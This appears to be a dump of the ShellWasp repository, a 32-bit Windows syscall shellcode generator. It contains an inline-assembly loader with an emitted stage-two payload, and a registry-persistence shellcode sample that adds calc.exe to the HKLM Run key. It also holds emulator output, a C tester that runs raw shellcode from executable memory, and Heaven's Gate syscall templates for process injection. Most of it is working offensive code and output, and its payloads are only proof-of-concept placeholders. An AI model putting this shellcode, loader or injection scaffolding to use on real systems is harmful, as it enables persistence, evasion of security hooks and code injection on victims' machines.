mov edi, [esp+0x2c]
push edi
push 0 ; PLARGE_INTEGER TimeOut
push 1 ; ; BOOLEAN Alertable TRUE
push dword ptr[ebp - 0x290] ; HANDLE ObjectHandle
int 3 ; breakpoint - remove if outside of debugger
mov eax, [edi] ; NtWaitForSingleObject syscall
call ourSyscall
mov edi, [esp+0xc]
push edi
int 3 ; breakpoint - remove if outside of debugger
; This is the stage two payload. The _emit keyword is how you can create those in inline Assembly for Visual Studio. In traditional shellcode, we would present this in a different way. The stage two payload is just a simple POC messagebox, but it could be exchanged for anything. There are other ways of doing this in inline ASsembly, but I prefer this way, as it is closer to actual shellcode.
ourShell:
_emit 0x90
_emit 0x90
_emit 0x90
_emit 0x90
_emit 0x31
_emit 0xc9
_emit 0xf7
_emit 0xe1
_emit 0x64
_emit 0x8b
_emit 0x41
_emit 0x30
_emit 0x8b
_emit 0x40
_emit 0x0c
_emit 0x8b
_emit 0x70
_emit 0x14
_emit 0xad
_emit 0x96
_emit 0xad
_emit 0x8b
_emit 0x58
_emit 0x10
_emit 0x8b
_emit 0x53
_emit 0x3c
_emit 0x01
_emit 0xda
_emit 0x8b
_emit 0x52
_emit 0x78
_emit 0x01
_emit 0xda
_emit 0x8b
_emit 0x72
_emit 0x20
_emit 0x01
_emit 0xde
_emit 0x31
_emit 0xc9
_emit 0x41
_emit 0xad
_emit 0x01
_emit 0xd8
_emit 0x81
_emit 0x38
_emit 0x47
_emit 0x65
_emit 0x74
_emit 0x50
_emit 0x75
_emit 0xf4
_emit 0x81
_emit 0x78
_emit 0x04
_emit 0x72
_emit 0x6f
_emit 0x63
_emit 0x41
_emit 0x75
_emit 0xeb
_emit 0x81
_emit 0x78
_emit 0x08
_emit 0x64
_emit 0x64
_emit 0x72
_emit 0x65
_emit 0x75
_emit 0xe2
_emit 0x8b
_emit 0x72
_emit 0x24
_emit 0x01
_emit 0xde
_emit 0x66
_emit 0x8b
_emit 0x0c
_emit 0x4e
_emit 0x49
_emit 0x8b
_emit 0x72
_emit 0x1c
_emit 0x01
_emit 0xde
_emit 0x8b
_emit 0x14
_emit 0x8e
_emit 0x01
_emit 0xda
_emit 0x89
_emit 0xd5
_emit 0x31
_emit 0xc9
_emit 0x51
_emit 0x68
_emit 0x61
_emit 0x72
_emit 0x79
_emit 0x41
_emit 0x68
_emit 0x4c
_emit 0x69
_emit 0x62
_emit 0x72
_emit 0x68
_emit 0x4c
_emit 0x6f
_emit 0x61
_emit 0x64
_emit 0x54
_emit 0x53
_emit 0xff
_emit 0xd2
_emit 0x68
_emit 0x6c
_emit 0x6c
_emit 0x61
_emit 0x61
_emit 0x66
_emit 0x81
_emit 0x6c
_emit 0x24
_emit 0x02
_emit 0x61
_emit 0x61
_emit 0x68
_emit 0x33
_emit 0x32
_emit 0x2e
_emit 0x64
_emit 0x68
_emit 0x55
_emit 0x73
_emit 0x65
_emit 0x72
_emit 0x54
_emit 0xff
_emit 0xd0
_emit 0x68
_emit 0x6f
_emit 0x78
_emit 0x41
_emit 0x61
_emit 0x66
_emit 0x83
_emit 0x6c
_emit 0x24
_emit 0x03
_emit 0x61
_emit 0x68
_emit 0x61
_emit 0x67
_emit 0x65
_emit 0x42
_emit 0x68
_emit 0x4d
_emit 0x65
_emit 0x73
_emit 0x73
_emit 0x54
_emit 0x50
_emit 0xff
_emit 0xd5
_emit 0x83
_emit 0xc4
_emit 0x10
_emit 0x31
_emit 0xd2
_emit 0x31
_emit 0xc9
_emit 0x52
_emit 0x68
_emit 0x50
_emit 0x77
_emit 0x6e
_emit 0x64
_emit 0x89
_emit 0xe7
_emit 0x52
_emit 0x68
_emit 0x59
_emit 0x65
_emit 0x73
_emit 0x73
_emit 0x89
_emit 0xe1
_emit 0x52
_emit 0x57
_emit 0x51
_emit 0x52
_emit 0xff
_emit 0xd0
_emit 0x83
_emit 0xc4
_emit 0x10
_emit 0x68
_emit 0x65
_emit 0x73
_emit 0x73
_emit 0x61
_emit 0x66
_emit 0x83
_emit 0x6c
_emit 0x24
_emit 0x03
_emit 0x61
_emit 0x68
_emit 0x50
_emit 0x72
_emit 0x6f
_emit 0x63
_emit 0x68
_emit 0x45
_emit 0x78
_emit 0x69
_emit 0x74
_emit 0x54
_emit 0x53
_emit 0xff
_emit 0xd5
_emit 0x31
_emit 0xc9
_emit 0x51
_emit 0xff
_emit 0xd0
end2:
nop
}
return 0;
}
================================================
FILE: Samples/alternative_create_process.asm
================================================
; Author: Shelby VandenHoek (VERONA Labs)
; This was made to highlight the ShellWasp technique for syscall shellcode. Note - Shelby used a slightly earlier
; version of ShellWasp, which has since changed. His shellcode still works on Win 7, 10, and 11.
; This is a way to create persistence via registry - in this case, for calculator!
; This is a total reworking/reimaging of an original 2005 syscall shellcode by P. Bania. The way of invoking the
; syscall then is obsolete now, so I told Shelby (then my employee and student) to recreate it from scratch using the
; ShellWasp technique. I had searched long and hard for any syscall shellcode that was non-Egghunter in nature, and Bania's
; was the only one that I could find. The original had used hardcoded syscall values - clearly a practice we
; would avoid today.
; Original: http://piotrbania.com/all/articles/windows_syscall_shellcode.pdf
[bits 32]
mov ebx,DWORD [fs:0x30]
mov ebx, dword [ebx+0xac]
mov ecx, esp
sub esp, 0x1000
cmp bl, 0x64 ; 21H2, Win10 release
jl less1
push 0x7002c ; NtTerminateProcess
push 0x3000f ; NtClose
push 0x60 ; NtSetValueKey
push 0x1d ; NtCreateKey
jmp saveSyscallArray
less1:
cmp bl, 0x63 ; 21h1, Win10 release
jl less2
push 0x7002c ; NtTerminateProcess
push 0x3000f ; NtClose
push 0x60 ; NtSetValueKey
push 0x1d ; NtCreateKey
jmp saveSyscallArray
less2:
cmp bl, 0x62 ; 20H2, Win10 release
jl less3
push 0x2c ; NtTerminateProcess
push 0xf ; NtClose
push 0x60 ; NtSetValueKey
push 0x1d ; NtCreateKey
jmp saveSyscallArray
less3:
cmp bl, 0xF0 ; 21H2, Win11 release
jl less4
push 0x7002c ; NtTerminateProcess
push 0x3003f ; NtClose
push 0x60 ; NtSetValueKey
push 0x1d ; NtCreateKey
jmp saveSyscallArray
less4:
cmp bl, 0x61 ; 2004, Win10 release
jl less5
push 0x2c ; NtTerminateProcess
push 0xf ; NtClose
push 0x60 ; NtSetValueKey
push 0x1d ; NtCreateKey
jmp saveSyscallArray
less5:
cmp bl, 0xBB ; 1909, Win10 release
jl less6
push 0x2c ; NtTerminateProcess
push 0xf ; NtClose
push 0x60 ; NtSetValueKey
push 0x1d ; NtCreateKey
jmp saveSyscallArray
less6:
cmp bl, 0xBA ; 1903, Win10 release
jl less7
push 0x2c ; NtTerminateProcess
push 0xf ; NtClose
push 0x60 ; NtSetValueKey
push 0x1d ; NtCreateKey
jmp saveSyscallArray
less7:
cmp bl, 0xB1 ; Win7, Sp1 release
jl end
push 0x29 ; NtTerminateProcess
push 0xc ; NtClose
push 0x5d ; NtSetValueKey
push 0x1a ; NtCreateKey
saveSyscallArray:
mov edi, esp
mov esp, ecx
sub esp, 0x400 ; Storage for Params
; Length without NULL: 0x7e
; Length with NULL: 0x80
; UTF-16: \Registry\Machine\Software\Microsoft\Windows\CurrentVersion\Run
xor edx, edx
push edx
mov dl, 0x6e
push dx
mov dl, 0x75
push dx
mov dl, 0x52
push dx
mov dl, 0x5c
push dx
mov dl, 0x6e
push dx
mov dl, 0x6f
push dx
mov dl, 0x69
push dx
mov dl, 0x73
push dx
mov dl, 0x72
push dx
mov dl, 0x65
push dx
mov dl, 0x56
push dx
mov dl, 0x74
push dx
mov dl, 0x6e
push dx
mov dl, 0x65
push dx
mov dl, 0x72
push dx
mov dl, 0x72
push dx
mov dl, 0x75
push dx
mov dl, 0x43
push dx
mov dl, 0x5c
push dx
mov dl, 0x73
push dx
mov dl, 0x77
push dx
mov dl, 0x6f
push dx
mov dl, 0x64
push dx
mov dl, 0x6e
push dx
mov dl, 0x69
push dx
mov dl, 0x57
push dx
mov dl, 0x5c
push dx
mov dl, 0x74
push dx
mov dl, 0x66
push dx
mov dl, 0x6f
push dx
mov dl, 0x73
push dx
mov dl, 0x6f
push dx
mov dl, 0x72
push dx
mov dl, 0x63
push dx
mov dl, 0x69
push dx
mov dl, 0x4d
push dx
mov dl, 0x5c
push dx
mov dl, 0x65
push dx
mov dl, 0x72
push dx
mov dl, 0x61
push dx
mov dl, 0x77
push dx
mov dl, 0x74
push dx
mov dl, 0x66
push dx
mov dl, 0x6f
push dx
mov dl, 0x53
push dx
mov dl, 0x5c
push dx
mov dl, 0x65
push dx
mov dl, 0x6e
push dx
mov dl, 0x69
push dx
mov dl, 0x68
push dx
mov dl, 0x63
push dx
mov dl, 0x61
push dx
mov dl, 0x4d
push dx
mov dl, 0x5c
push dx
mov dl, 0x79
push dx
mov dl, 0x72
push dx
mov dl, 0x74
push dx
mov dl, 0x73
push dx
mov dl, 0x69
push dx
mov dl, 0x67
push dx
mov dl, 0x65
push dx
mov dl, 0x52
push dx
mov dl, 0x5c
push dx
mov [ebp-4], esp ; REG_PATH
; Length without NULL: 0x38
; Length with NULL: 0x3a
; UTF-16: c:\Windows\System32\calc.exe
xor edx, edx
push edx
mov dl, 0x65
push dx
mov dl, 0x78
push dx
mov dl, 0x65
push dx
mov dl, 0x2e
push dx
mov dl, 0x63
push dx
mov dl, 0x6c
push dx
mov dl, 0x61
push dx
mov dl, 0x63
push dx
mov dl, 0x5c
push dx
mov dl, 0x32
push dx
mov dl, 0x33
push dx
mov dl, 0x6d
push dx
mov dl, 0x65
push dx
mov dl, 0x74
push dx
mov dl, 0x73
push dx
mov dl, 0x79
push dx
mov dl, 0x53
push dx
mov dl, 0x5c
push dx
mov dl, 0x73
push dx
mov dl, 0x77
push dx
mov dl, 0x6f
push dx
mov dl, 0x64
push dx
mov dl, 0x6e
push dx
mov dl, 0x69
push dx
mov dl, 0x57
push dx
mov dl, 0x5c
push dx
mov dl, 0x3a
push dx
mov dl, 0x43
push dx
mov [ebp-8], esp ; CALC_PATH
; Length without NULL: 0x26
; Length with NULL: 0x28
; UTF-16: Syscall Created Key
xor edx, edx
push edx
mov dl, 0x79
push dx
mov dl, 0x65
push dx
mov dl, 0x4b
push dx
mov dl, 0x20
push dx
mov dl, 0x64
push dx
mov dl, 0x65
push dx
mov dl, 0x74
push dx
mov dl, 0x61
push dx
mov dl, 0x65
push dx
mov dl, 0x72
push dx
mov dl, 0x43
push dx
mov dl, 0x20
push dx
mov dl, 0x6c
push dx
mov dl, 0x6c
push dx
mov dl, 0x61
push dx
mov dl, 0x63
push dx
mov dl, 0x73
push dx
mov dl, 0x79
push dx
mov dl, 0x53
push dx
mov [ebp-12], esp ; VALUE_NAME
; UNICODE_STRING ValueName
xor edx, edx
push dword [ebp-12] ; Buffer
mov dx, 0x28
push dx ; Max Length
mov dx, 0x26
push dx ; Length
mov [ebp-16], esp ; US_VALUE_NAME
; UNICODE_STRING REG_PATH
xor edx, edx
push dword [ebp-4] ; Buffer
mov dx, 0x80
push dx ; Max Length
mov dx, 0x7E
push dx ; Length
mov [ebp-20], esp ; US_REG_PATH
; _OBJECT_ATTRIBUTES
xor edx, edx
xor ecx, ecx
push edx ; SecurityQualityOfService = NULL
push edx ; SecurityDescriptor = NULL
inc ecx
shl ecx, 6
push ecx ; Attributes = OBJ_CASE_INSENSITIVE = 0x40
push dword [ebp-20] ; US_REG_PATH
push edx ; Root Directory = NULL
push 0x18 ; Length
mov [ebp-24], esp ; OBJECT_ATTR
; KeyHandle
xor edx, edx
push edx
mov [ebp-28], esp ; PKEY_HANDLE
; Access Mask:
; KEY_ALL_ACCESS = 0xF003F
; Will Use Virtual Registry
; Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
; xor ecx, ecx
; inc ecx ; 0x1
; shl ecx, 4 ; 0x10
; mov edx, ecx
; dec ecx ; 0xF
; shl ecx, 16 ; 0xF0000
; shl edx, 2 ; 0x40
; dec edx ; 0x3F
; add ecx, edx ; 0xF0000 + 0x3F = 0xF003F
; mov [ebp-32], ecx ; ACCESS_MASK
; KEY_ALL_ACCESS | KEY_WOW64_64KEY = 0xF013F
; Will Use Normal Registry
; Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
xor ecx, ecx
inc ecx ; 0x1
shl ecx, 4 ; 0x10
mov edx, ecx
dec ecx ; 0xF
shl ecx, 16 ; 0xF0000
shl edx, 2 ; 0x40
dec edx ; 0x3F
add ecx, edx ; 0xF0000 + 0x3F = 0xF003F
xor edx, edx
inc edx ; 0x1
shl edx, 8 ; 0x100
add ecx, edx ; 0xF003F + 0x100 = 0xF013F
mov [ebp-32], ecx
; KEY_SET_VALUE = 0x2
; Will Use Virtual Registry
; Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
; xor ecx, ecx
; inc ecx ; 0x1
; inc ecx ; 0x2
; mov [ebp-32], ecx ; ACCESS_MASK
; KEY_SET_VALUE | KEY_WOW64_64KEY = 0x102
; Will Use Normal Registry
; Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
; xor ecx, ecx
; inc ecx ; 0x1
; shl ecx, 8 ; 0x100
; inc ecx ; 0x101
; inc ecx ; 0x102
; mov [ebp-32], ecx ; ACCESS_MASK
NtCreateKey:
push edi ; Save Syscall Array
xor edx, edx
push edx ; KEY_DISPOSITION = NULL
push edx ; Create Options REG_OPTION_NON_VOLATILE = 0x0
push edx ; Class = NULL
push edx ; TitleIndex = 0x0
push dword [ebp-24] ; OBJECT_ATTR
push dword [ebp-32] ; ACCESS_MASK
push dword [ebp-28] ; PKEY_HANDLE
mov eax, [edi]
call syscallFunc
add esp, 28
pop edi ; Get Syscall Array
xor ecx, ecx
cmp eax, ecx
jne NtTerminateProcess
RegSetValueKey:
push edi ; Save Syscall Array
xor edx, edx
push 0x38
push dword [ebp-8] ; CALC_PATH
inc edx
push edx ; Type: REG_SZ = 0x1
dec edx
push edx ; Title Index = 0x0
push dword [ebp-16] ; US_VALUE_NAME
mov eax, [ebp-28] ; PKEY_HANDLE
push dword [eax]
mov eax, [edi+4]
call syscallFunc
add esp, 24
pop edi ; Get Syscall Array
NtClose:
push edi ; Save Syscall Array
mov eax, [ebp-28] ; PKEY_HANDLE
push dword [eax]
mov eax, [edi+8]
call syscallFunc
add esp, 4
pop edi ; Get Syscall Array
NtTerminateProcess:
push edi ; Save Syscall Array
xor edx, edx
push edx
push edx
mov eax, [edi+12]
call syscallFunc
add esp, 8
jmp skipSyscall
syscallFunc:
mov ebx,DWORD [fs:0x30]
mov ebx, [ebx+0xa4] ; OS Major Version
cmp bl, 10
jne win7
win10:
call [fs:0xc0]
ret
win7:
xor ecx, ecx
lea edx, [esp+4]
call [fs:0xc0]
add esp, 4
ret
skipSyscall:
end:
================================================
FILE: Samples/alternative_create_process_SHAREM_output.txt
================================================
Output from SHAREM: https://github.com/Bw3ll/sharem
[*] Emulating x86 shellcode
[*] CPU counter: 358
[*] Emulation complete
************* APIs *************
************* Syscalls *************
0x1200034b NtCreateKey(PHANDLE KeyHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, ULO
G TitleIndex, PUNICODE_STRING Class, ULONG CreateOptions, PUNLONG Disposition)
PHANDLE KeyHandle: 0x16fffae8 -> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
ACCESS_MASK DesiredAccess: 0xf013f
POBJECT_ATTRIBUTES ObjectAttributes:
ULONG Length: 0x18
HANDLE RootDirectory: 0x0
PUNICODE_STRING ObjectName: \Registry\Machine\Software\Microsoft\Windows\CurrentVersion\Run
ULONG Attributes: OBJ_CASE_INSENSITIVE
PVOID SecurityDescriptor: 0x0 -> 0x0
PVOID SecurityQualityOfService: 0x0 -> 0x0
ULONG TitleIndex: 0x0
PUNICODE_STRING Class: 0x0
ULONG CreateOptions: 0x0
PUNLONG Disposition: 0x0
Return: NTSTATUS STATUS_SUCCESS
EAX: 0x1d - (Windows 10, SP 21H1)
0x1200034b NtSetValueKey(HANDLE KeyHandle, PUNICODE_STRING ValueName, ULONG TitleIndex, ULONG Type, PVOID Dat
, ULONG DataSize)
HANDLE KeyHandle: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
PUNICODE_STRING ValueName: 385874700
ULONG TitleIndex: 0x0
ULONG Type: 0x1
PVOID Data: C:\Windows\System32\calc.exe
ULONG DataSize: 0x38
Return: NTSTATUS STATUS_SUCCESS
EAX: 0x60 - (Windows 10, SP 21H1)
0x1200034b NtClose(HANDLE Handle)
HANDLE Handle: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
Return: NTSTATUS STATUS_SUCCESS
EAX: 0x3000f - (Windows 10, SP 21H1)
0x1200034b NtTerminateProcess(HANDLE ProcessHandle, NTSTATUS ExitStatus)
HANDLE ProcessHandle: 0x0
NTSTATUS ExitStatus: STATUS_SUCCESS
Return: NTSTATUS STATUS_SUCCESS
EAX: 0x7002c - (Windows 10, SP 21H1)
************* DLLs *************
DLLs None
************* Artifacts *************
*** Paths ***
** Misc **
C:\Windows\System32\calc.exe
\\Registry\\Machine\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
*** Files ***
** Misc **
calc.exe
*** EXE / DLLs ***
C:\Windows\System32\calc.exe
*** Registry Actions ***
** Add **
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
** Edit **
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
Syscall Created Key
C:\Windows\System32\calc.exe
*** Registry Techniques ***
** Persistence **
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
*** Registry Hierarchy ***
** HKEY_Local_Machine **
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
*** Registry Miscellaneous ***
Software\\Microsoft\\Windows\\CurrentVersion\\Run
================================================
FILE: Samples/alternative_create_process_tester.c
================================================
// ; Author: Shelby VandenHoek (VERONA Labs)
// ; This was made to highlight the ShellWasp technique for syscall shellcode. Note - Shelby used a slightly earlier
// ; version of ShellWasp, which has since changed. His shellcode still works on Win 7, 10, and 11.
// ; This is a way to create persistence via registry - in this case, for calculator!
// ; This is a total reworking/reimaging of an original 2005 syscall shellcode by P. Bania. The way of invoking the
// ; syscall then is obsolete now, so I told Shelby (then my employee and student) to recreate it from scratch using the
// ; ShellWasp technique. I had searched long and hard for any syscall shellcode that was non-Egghunter in nature, and Bania's
// ; was the only one that I could find. The original had used hardcoded syscall values - clearly a practice we
// ; would avoid today.
// ; Original from 2005: http://piotrbania.com/all/articles/windows_syscall_shellcode.pdf
// ; This is intended to a script to test the shellcode - automatically generated by SHAREM (shellcode analysis
// ; framework) from the binary file. The .ASM is available separately. This program must be debugged to work
// ; as it has an int 3 breakpoint in it.
#include <windows.h>
#include <stdio.h>
char shellcode[] = "\x64\x8b\x1d\x30\x00\x00\x00\x8b\x9b\xac\x00\x00\x00\x89\xe1\x81\xec\x00\x10\x00\x00\x80\xfb\x64\x7c\x10\x68\x2c\x00\x07\x00\x68\x0f\x00\x03\x00\x6a\x60\x6a\x1d\xeb\x77\x80\xfb\x63\x7c\x10\x68\x2c\x00\x07\x00\x68\x0f\x00\x03\x00\x6a\x60\x6a\x1d\xeb\x62\x80\xfb\x62\x7c\x0a\x6a\x2c\x6a\x0f\x6a\x60\x6a\x1d\xeb\x53\x80\xfb\xf0\x7c\x10\x68\x2c\x00\x07\x00\x68\x3f\x00\x03\x00\x6a\x60\x6a\x1d\xeb\x3e\x80\xfb\x61\x7c\x0a\x6a\x2c\x6a\x0f\x6a\x60\x6a\x1d\xeb\x2f\x80\xfb\xbb\x7c\x0a\x6a\x2c\x6a\x0f\x6a\x60\x6a\x1d\xeb\x20\x80\xfb\xba\x7c\x0a\x6a\x2c\x6a\x0f\x6a\x60\x6a\x1d\xeb\x11\x80\xfb\xb1\x0f\x8c\xcb\x02\x00\x00\x6a\x29\x6a\x0c\x6a\x5d\x6a\x1a\x89\xe7\x89\xcc\x81\xec\x00\x04\x00\x00\x31\xd2\x52\xb2\x6e\x66\x52\xb2\x75\x66\x52\xb2\x52\x66\x52\xb2\x5c\x66\x52\xb2\x6e\x66\x52\xb2\x6f\x66\x52\xb2\x69\x66\x52\xb2\x73\x66\x52\xb2\x72\x66\x52\xb2\x65\x66\x52\xb2\x56\x66\x52\xb2\x74\x66\x52\xb2\x6e\x66\x52\xb2\x65\x66\x52\xb2\x72\x66\x52\xb2\x72\x66\x52\xb2\x75\x66\x52\xb2\x43\x66\x52\xb2\x5c\x66\x52\xb2\x73\x66\x52\xb2\x77\x66\x52\xb2\x6f\x66\x52\xb2\x64\x66\x52\xb2\x6e\x66\x52\xb2\x69\x66\x52\xb2\x57\x66\x52\xb2\x5c\x66\x52\xb2\x74\x66\x52\xb2\x66\x66\x52\xb2\x6f\x66\x52\xb2\x73\x66\x52\xb2\x6f\x66\x52\xb2\x72\x66\x52\xb2\x63\x66\x52\xb2\x69\x66\x52\xb2\x4d\x66\x52\xb2\x5c\x66\x52\xb2\x65\x66\x52\xb2\x72\x66\x52\xb2\x61\x66\x52\xb2\x77\x66\x52\xb2\x74\x66\x52\xb2\x66\x66\x52\xb2\x6f\x66\x52\xb2\x53\x66\x52\xb2\x5c\x66\x52\xb2\x65\x66\x52\xb2\x6e\x66\x52\xb2\x69\x66\x52\xb2\x68\x66\x52\xb2\x63\x66\x52\xb2\x61\x66\x52\xb2\x4d\x66\x52\xb2\x5c\x66\x52\xb2\x79\x66\x52\xb2\x72\x66\x52\xb2\x74\x66\x52\xb2\x73\x66\x52\xb2\x69\x66\x52\xb2\x67\x66\x52\xb2\x65\x66\x52\xb2\x52\x66\x52\xb2\x5c\x66\x52\x89\x65\xfc\x31\xd2\x52\xb2\x65\x66\x52\xb2\x78\x66\x52\xb2\x65\x66\x52\xb2\x2e\x66\x52\xb2\x63\x66\x52\xb2\x6c\x66\x52\xb2\x61\x66\x52\xb2\x63\x66\x52\xb2\x5c\x66\x52\xb2\x32\x66\x52\xb2\x33\x66\x52\xb2\x6d\x66\x52\xb2\x65\x66\x52\xb2\x74\x66\x52\xb2\x73\x66\x52\xb2\x79\x66\x52\xb2\x53\x66\x52\xb2\x5c\x66\x52\xb2\x73\x66\x52\xb2\x77\x66\x52\xb2\x6f\x66\x52\xb2\x64\x66\x52\xb2\x6e\x66\x52\xb2\x69\x66\x52\xb2\x57\x66\x52\xb2\x5c\x66\x52\xb2\x3a\x66\x52\xb2\x43\x66\x52\x89\x65\xf8\x31\xd2\x52\xb2\x79\x66\x52\xb2\x65\x66\x52\xb2\x4b\x66\x52\xb2\x20\x66\x52\xb2\x64\x66\x52\xb2\x65\x66\x52\xb2\x74\x66\x52\xb2\x61\x66\x52\xb2\x65\x66\x52\xb2\x72\x66\x52\xb2\x43\x66\x52\xb2\x20\x66\x52\xb2\x6c\x66\x52\xb2\x6c\x66\x52\xb2\x61\x66\x52\xb2\x63\x66\x52\xb2\x73\x66\x52\xb2\x79\x66\x52\xb2\x53\x66\x52\x89\x65\xf4\x31\xd2\xff\x75\xf4\x66\xba\x28\x00\x66\x52\x66\xba\x26\x00\x66\x52\x89\x65\xf0\x31\xd2\xff\x75\xfc\x66\xba\x80\x00\x66\x52\x66\xba\x7e\x00\x66\x52\x89\x65\xec\x31\xd2\x31\xc9\x52\x52\x41\xc1\xe1\x06\x51\xff\x75\xec\x52\x6a\x18\x89\x65\xe8\x31\xd2\x52\x89\x65\xe4\x31\xc9\x41\xc1\xe1\x04\x89\xca\x49\xc1\xe1\x10\xc1\xe2\x02\x4a\x01\xd1\x31\xd2\x42\xc1\xe2\x08\x01\xd1\x89\x4d\xe0\x57\x31\xd2\x52\x52\x52\x52\xff\x75\xe8\xff\x75\xe0\xff\x75\xe4\x8b\x07\xe8\x4e\x00\x00\x00\x83\xc4\x1c\x5f\x31\xc9\x39\xc8\x75\x32\x57\x31\xd2\x6a\x38\xff\x75\xf8\x42\x52\x4a\x52\xff\x75\xf0\x8b\x45\xe4\xff\x30\x8b\x47\x04\xe8\x28\x00\x00\x00\x83\xc4\x18\x5f\x57\x8b\x45\xe4\xff\x30\x8b\x47\x08\xe8\x16\x00\x00\x00\x83\xc4\x04\x5f\x57\x31\xd2\x52\x52\x8b\x47\x0c\xe8\x05\x00\x00\x00\x83\xc4\x08\xeb\x2b\x64\x8b\x1d\x30\x00\x00\x00\x8b\x9b\xa4\x00\x00\x00\x80\xfb\x0a\x75\x08\x64\xff\x15\xc0\x00\x00\x00\xc3\x31\xc9\x8d\x54\x24\x04\x64\xff\x15\xc0\x00\x00\x00\x83\xc4\x04\xc3";
int main(int argc, char **argv) {
HINSTANCE hInstLib = LoadLibrary(TEXT("user32.dll"));
int i = 0, len = 0, target_addy = 0, offset = 0;
void*stage = VirtualAlloc(0, 3475, 0x1000,0x40 );
printf("[*] Memory allocated: 0x%08x\n", stage);
len = sizeof(shellcode);
printf("[*] Size of Shellcode: %08x\n", len);
memmove(stage, shellcode, 3475);
printf("[*] Shellcode copied\n");
target_addy = (char*)stage + 0;
printf("[*] Adjusting offset: 0x%08x\n", target_addy);
__asm {
int 3
mov eax, target_addy
jmp eax
}
}
================================================
FILE: setup.py
================================================
from setuptools import setup, find_packages
import os
import re
NAME = "ShellWasp"
VERSION = "1.0.1"
REQUIREMENTS = [
"colorama>=0.4.4",
"keystone-engine>=0.9.2",
]
setup(
name='ShellWasp: 32-bit Syscall Shellcode Generator',
author='Bramwell Brizendine',
description='ShellWasp - Generating 32-bit, WoW64 shellcode with Windows Syscalls',
version=VERSION,
long_description="Words",
url='https://github.com/',
include_package_data=True,
packages=find_packages(),
install_requires=REQUIREMENTS,
classifiers=[
"Programming Language :: Python :: 3",
],
python_requires='>=3.6',
)
================================================
FILE: shellWasp.py
================================================
import start.shellWasp
from start.shellWasp import *
if __name__ == "__main__":
print ("hi. i am an evil wasp.\n")
syscallMain()
================================================
FILE: start/Syscall Output/Win1011_NtAllocateVirtualMemory_NtQuerySystemInformation_NtOpenProcess_20230414_143422.txt
================================================
call GetPC1
GetPC1:
add [esp], 5
retf ; Invoke Heaven's gate -- go x64
db 0x41,0x8b,0x1c,0x24 ; x64: mov ebx,dword ptr [r12]
push 0x23
call GetPC2
GetPC2:
mov [esp+4], 0x23
add [esp], 0xa
retf ; Invoke Heaven's gate -- go x86
mov ebx, [ebx+0x30]
mov ebx, [ebx+0xac]
mov ecx, esp
sub esp, 0x1000
cmp bl, 0xF0 ; 21h2, Win11 release
jl end
push 0x18 ; NtAllocateVirtualMemory
push 0x36 ; NtQuerySystemInformation
push 0x26 ; NtOpenProcess
push 0x55 ; NtCreateFile
push 0x4a ; NtCreateSection
push 0x28 ; NtMapViewOfSection
push 0x50 ; NtProtectVirtualMemory
push 0x3a ; NtWriteVirtualMemory
push 0xc5 ; NtCreateThreadEx
push 0xd0004 ; NtWaitForSingleObject
saveSyscallArray:
mov edi, esp
mov esp, ecx
push edi
push 0x00000000 ; ULONG Protect
push 0x00000000 ; ULONG AllocationType
push 0x00000000 ; PSIZE_T RegionSize
push 0x00000000 ; ULONG_PTR ZeroBits
push 0x00000000 ; PVOID *BaseAddress
push 0x00000000 ; HANDLE ProcessHandle
mov eax, [edi+0x24] ; NtAllocateVirtualMemory syscall
call ourSyscall
mov edi, [esp+0x18]
push edi
push 0x00000000 ; PULONG ReturnLength
push 0x00000000 ; ULONG SystemInformationLength
push 0x00000000 ; PVOID SystemInformation
push 0x00000000 ; SYSTEM_INFORMATION_CLASS SystemInformationClass
mov eax, [edi+0x20] ; NtQuerySystemInformation syscall
call ourSyscall
mov edi, [esp+0x10]
push edi
push 0x00000000 ; PCLIENT_ID ClientId
push 0x00000000 ; POBJECT_ATTRIBUTES ObjectAttributes
push 0x00000000 ; ACCESS_MASK AccessMask
push 0x00000000 ; PHANDLE ProcessHandle
mov eax, [edi+0x1c] ; NtOpenProcess syscall
call ourSyscall
mov edi, [esp+0x10]
push edi
push 0x00000000 ; ULONG EaLength
push 0x00000000 ; PVOID EaBuffer
push 0x00000000 ; ULONG CreateOptions
push 0x00000000 ; ULONG CreateDisposition
push 0x00000000 ; ULONG ShareAccess
push 0x00000000 ; ULONG FileAttributes
push 0x00000000 ; PLARGE_INTEGER AllocationSize
push 0x00000000 ; PIO_STATUS_BLOCK IoStatusBlock
push 0x00000000 ; POBJECT_ATTRIBUTES ObjectAttributes
push 0x00000000 ; ACCESS_MASK DesiredAccess
push 0x00000000 ; PHANDLE FileHandle
mov eax, [edi+0x18] ; NtCreateFile syscall
call ourSyscall
mov edi, [esp+0x2c]
push edi
push 0x00000000 ; HANDLE FileHandle
push 0x00000000 ; ULONG AllocationAttributes
push 0x00000000 ; ULONG SectionPageProtection
push 0x00000000 ; PLARGE_INTEGER MaximumSize
push 0x00000000 ; POBJECT_ATTRIBUTES ObjectAttributes
push 0x00000000 ; ACCESS_MASK DesiredAccess
push 0x00000000 ; PHANDLE SectionHandle
mov eax, [edi+0x14] ; NtCreateSection syscall
call ourSyscall
mov edi, [esp+0x1c]
push edi
push 0x00000000 ; ULONG Protect
push 0x00000000 ; ULONG AllocationType
push 0x00000000 ; DWORD InheritDisposition
push 0x00000000 ; PULONG ViewSize
push 0x00000000 ; PLARGE_INTEGER SectionOffset
push 0x00000000 ; ULONG CommitSize
push 0x00000000 ; ULONG ZeroBits
push 0x00000000 ; PVOID *BaseAddress
push 0x00000000 ; HANDLE ProcessHandle
push 0x00000000 ; HANDLE SectionHandle
mov eax, [edi+0x10] ; NtMapViewOfSection syscall
call ourSyscall
mov edi, [esp+0x28]
push edi
